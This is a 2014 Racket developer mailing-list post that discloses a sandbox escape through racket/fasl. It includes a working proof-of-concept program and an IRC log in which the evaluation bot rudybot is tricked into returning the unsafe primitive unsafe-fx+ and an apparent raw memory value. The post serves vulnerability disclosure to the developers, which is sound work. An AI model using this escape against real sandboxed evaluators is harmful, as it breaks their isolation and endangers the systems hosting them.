[racket-dev] racket/fasl allows sandbox escape

From: Sam Tobin-Hochstadt (samth at cs.indiana.edu)
Date: Wed Jul 9 09:39:50 EDT 2014

The following exchange with rudybot, which is running the programs in
a sandbox, demonstrates the issue:

09:35 <samth> rudybot: eval (let () (local-require compiler/zo-marshal
compiler/zo-structs racket/fasl) (fasl->s-exp (zo-marshal
(compilation-top 3 (prefix 0 '() '()) (let-void 1 #t (install-value 1
0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
09:35 <rudybot> samth: ; Value: #<procedure:unsafe-fx+>
09:36 <samth> rudybot: eval ((let () (local-require
compiler/zo-marshal compiler/zo-structs racket/fasl) (fasl->s-exp
(zo-marshal (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t
(install-value 1 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
vector-ref vector-ref)
09:36 <rudybot> samth: ; Value: 32681168

The relevant program is:

(let ()
  (local-require compiler/zo-marshal compiler/zo-structs racket/fasl)
  (fasl->s-exp (zo-marshal
                      (compilation-top 3
                         (prefix 0 '() '())
                         (let-void 1 #t (install-value 1 0 #t (primval
1140) (localref #t 0 #f #f #f )))))))

Sam

Posted on the dev mailing list.